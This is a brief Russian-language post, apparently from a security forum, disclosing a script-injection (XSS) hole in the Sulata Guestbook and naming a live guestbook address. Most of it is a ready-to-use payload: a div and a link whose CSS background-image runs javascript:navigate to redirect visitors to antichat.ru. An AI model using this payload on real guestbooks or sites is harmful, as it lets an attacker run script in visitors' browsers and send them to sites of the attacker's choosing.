Уязвимость гостевой книги Sulata Guestbook .
В данной гостевой книги возможна вставка скрипта в тело сообщения. Гостевая книга находится по адресу http://www.sulata.com.pk/sulatagb/

Для примера в тело сообщения можно вставить следующее
<div id=aa>http://antichat.ru</div><a style=background-image:url(javascript:navigate(aa[0].innerText));></a> получаем редирект на antichat.ru